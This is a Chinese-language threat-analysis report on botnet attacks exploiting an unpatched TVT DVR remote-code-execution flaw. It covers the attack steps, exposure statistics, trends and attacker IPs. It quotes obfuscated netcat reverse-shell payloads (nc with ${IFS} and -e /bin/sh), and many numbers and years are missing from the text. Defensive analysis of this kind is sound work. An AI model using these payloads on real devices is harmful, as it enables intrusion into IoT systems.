执行摘要年10月，我们捕获到针对TVTDVR设备的探测活动（《一个月内首现三类漏洞探测活动，僵尸网络又在酝酿攻击？》[1]），其恶意载荷位于POST请求的body中，尝试在DVR上使用nc命令建立一个反向shell（通常针对物联网设备的漏洞探测，僵尸网络会直接投递样本，建立反向shell的攻击行为非常少见）。近期，我们在排查绿盟威胁捕获系统相关日志的过程中发现，攻击者开始使用新的漏洞[2]感染TVTDVR设备。该漏洞具有较复杂的攻击流程，对捕获系统交互要求极高；恶意载荷经过base64编码，很容易被安全团队遗漏；使用nc命令建立一个反向shell的攻击行为也非常少见。本文将通过脆弱性、暴露情况以及威胁分析三个方面，分析本次捕获到的攻击。脆弱性分析一节，我们结合互联网公开PoC及捕获到的攻击，分析了攻击者攻击的手法。暴露情况分析一节，我们结合绿盟威胁情报中心，发现年至今，互联网中暴露台开放了端口的TVT设备。威胁分析一节，我们分析了年1月至今该攻击的趋势，怀疑年5月-6月期间，攻击者升级了武器库，对该漏洞的利用进行了微调。另外，大部分反向shell的服务器还在不同程度地参与了扫描探测活动，利用其他漏洞和服务，攻击物联网设备。

截至成稿，我们发现针对该漏洞的利用行为仍非常活跃，官方尚未发布相关补丁修复该漏洞，应引起各方的重视。此次针对TVTDVR漏洞的利用，复杂的攻击流程、base64编码的恶意载荷、建立反向shell的样本投递方法，极大程度隐藏了其样本服务器的信息，无论对捕获系统的交互能力还是对捕获后的分析，都是一种极高考验。

一、脆弱性分析本次我们捕获到的攻击，漏洞利用（已在github上公开，并无CVE编号）详见公开PoC[2]，目标端口/TCP，该漏洞针对深圳TVTDVR设备，需要注意的是，目前已知79家厂商OEM产品[3]同样存在该问题，有被攻陷的风险。我们捕获到的攻击过程分为三步：第一步，硬编码脆弱性验证。攻击者向/TCP端口发送硬编码的密钥字符串“{D79E94C5-70F0-46BD-B-ECCB}”。若设备返回“{D79E94C5-70F0-46BD-B-ECCB}”则说明设备具备脆弱性。第二步，建立反向shell。攻击者发送一条HTTPGET请求，PATH_INFO为：/saveSystemConfig，恶意载荷位于body中，采用base64编码，经解码后即可获得真实的恶意载荷，需要注意的是，不同于普通的僵尸网络触发RCE后会直接执行命令下载样本，该僵尸网络会执行nc命令，尝试建立反向shell连接服务器的端口。第三步，服务器下发恶意样本。当僵尸主机使用nc向服务器建立反向shell后，该僵尸网络的服务器会下发相应指令，从另一台服务器下载样本并执行，如图1.1所示。图1.1服务器下发样本的过程此次针对TVTDVR的攻击，复杂的攻击流程、base64编码的恶意载荷、建立反向shell的样本投递方法，极大程度隐藏了其样本服务器的信息，无论对捕获系统的交互能力还是对捕获后的分析，都是一种极高考验。二、暴露情况分析通过使用绿盟威胁情报中心对TVTDVR指纹进行搜索，共发现条记录（年至成稿），暴露且开放了/TCP端口的TVTDVR国家分布（前十）情况如图2.1所示，可以看出美国和英国的暴露数量明显多于其他国家。图2.1TVTDVR国家分布（前十）情况（年1月至7月）截至年7月，我们尚未发现相关厂商公布补丁修复该漏洞，这也是物联网产业链需要面对的问题：产业链过长，若上游的供应商产品存在漏洞，将直接影响下游厂商集成、制造的产品。上游的供应商若不及时提供相关补丁，下游厂商修复其产品的漏洞更是无从谈起。所以治理这种问题，还需要多方的共同努力。三、威胁分析

3.1攻击趋势

我们对年以来，该攻击的次数进行了统计，如图3.1所示。发现针对本文所述漏洞的利用总体分为三个区间：

年1月至年4月，该攻击非常活跃。

年5月-6月，该攻击骤减。

年7月起，该攻击再次活跃。

图3.1攻击次数变化趋势通过分析恶意载荷，我们怀疑造成年5月-6月攻击活动骤减的原因，是攻击者在此期间升级了武器库，微调了建立反向shell的命令：

年7月前，针对本文所述漏洞的攻击，建立反向shell的载荷为：$(nc${IFS}xxx.xxx.xxx.xxx${IFS}$${IFS}-e${IFS}$SHELL${IFS})

年7月起，针对本文所述漏洞的攻击，建立反向shell的载荷更新为：$(nc${IFS}xxx.xxx.xxx.xxx${IFS}$${IFS}-e${IFS}/bin/sh)最后，我们统计了攻击源数量变化，年1月至年7月，相同时间段攻击源数量始终在个位数之间波动，但攻击源的总数量超过了20个。我们推测，攻击源数量相对稳定的原因，是攻击者使用了固定的主机利用该漏洞，没有发动僵尸主机参与扫描。而攻击源总数超过20个则说明，针对该漏洞的攻击源交替活跃，并未出现在同一时段爆发的情况。

3.2个别反向shell服务器分析

我们对捕获到的攻击中，反向shell尝试连接的服务器进行了分析，发现大部分反向shell的服务器还在不同程度地利用其他漏洞，攻击物联网设备。其中部分IP需要引起注意：..46.6，位于摩尔多瓦基希讷乌，从年1月起截至成稿，始终保持较高的扫描频率，除了探测本文所述的TVTDVRRCE外，还积极利用以下漏洞攻击物联网设备投递样本：

安卓ADB。安卓的ADB服务位于端口，针对该服务的攻击参见《攻击物联网设备？黑客钟爱端口》[4]。需要注意的是，年7月起截止成稿，该IP针对物联网设备的攻击集中在了安卓ADB服务上。

NetlinkGPONRCE。漏洞详情参见EDB-ID：[5]。

MultIPleDrayTekProductsRCE。漏洞详情参见EDB-ID：[6]。

LILINDVR0-day。漏洞详情参见《LILINDVR在野0-day漏洞分析报告》[7]。

MVPowerDVRShellCommandExecution。漏洞详情参见EDB-ID：[8]。

NVMS-RCE。漏洞详情参见《一个月内首现三类漏洞探测活动，僵尸网络又在酝酿攻击？》。

...，位于荷兰德伦特省梅珀尔，该IP从6月底开始出现针对本文所述TVTDVRRCE的探测行为，且呈现逐渐上升趋势。该IP还在利用以下漏洞攻击物联网设备投递样本：

NetlinkGPONRCE。漏洞详情参见EDB-ID：。

CVE--[9]。该漏洞实际位于GoAhead并且被摄像头的OEM厂商修改，这导致了该脆弱性的产生。漏洞详情参见《MultiplevulnerabilitiesfoundinWirelessIPCamera(P2P)WIFICAMcamerasandvulnerabilitiesincustom

转载请注明:http://www.hechaoqiongq.com/jxnwjp/17581.html